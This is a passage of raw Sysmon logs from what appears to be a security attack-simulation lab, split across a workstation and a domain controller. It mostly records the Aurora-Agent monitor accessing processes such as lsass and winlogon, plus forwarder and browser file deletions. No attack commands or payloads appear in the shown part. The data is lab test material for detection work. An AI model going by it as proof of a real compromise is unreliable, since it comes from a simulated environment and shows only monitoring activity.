Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016554Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.699{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016553Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.688{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016552Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.682{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016551Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.675{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016550Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.672{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016549Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.641{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016548Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.632{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016547Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.625{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016546Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.618{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016545Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.610{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016544Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.584{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016543Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.575{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016542Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.570{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016541Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.561{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016540Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.557{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016539Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.555{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016538Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.552{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016537Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.547{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 23542300x800000000000000016536Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:22.097{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B3A503C8B8910013E62473C5EF07897,SHA256=EEEB3F6B4EEFF3008559268CCF81CF6F4E967C564B9853DFB800C4764AF3DAA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000042043Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:23.864{FE4C2B44-E474-63C7-2806-00000000AF02}7096ATTACKRANGE\AdministratorC:\Program Files (x86)\Internet Explorer\IEXPLORE.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\RPLS4I1F\NewErrorPageTemplate[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042042Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:23.755{FE4C2B44-E474-63C7-2806-00000000AF02}7096ATTACKRANGE\AdministratorC:\Program Files (x86)\Internet Explorer\IEXPLORE.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\7UW8YHFM\dnserror[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042041Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:23.104{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4871C83A4D4D912A8EC2EAF3EA67A58F,SHA256=8D14F64998E051CFB7AE59A47C2341010DA0DAC4AEE11ADADAAA639AC28C29B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042040Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:23.103{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016569Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:23.196{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E338452EAB298441FE016C45DE5BBC9,SHA256=9F7994F6258AEBC35DA4EE3AEC8827B98F19D8D35D03FAD0B09D0584F98717E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.419{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.326{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.326{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.326{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.326{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.326{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.201{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B012060858DDB606031B5622A633B53B,SHA256=2B30AA70A1EEA36C95815FB08DC28B7D2D822B872063C2572F03F44DFCE223F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.150{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005692C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.150{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005692C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.150{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005692C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.150{FE4C2B44-E474-63C7-2706-00000000AF02}7043176C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet 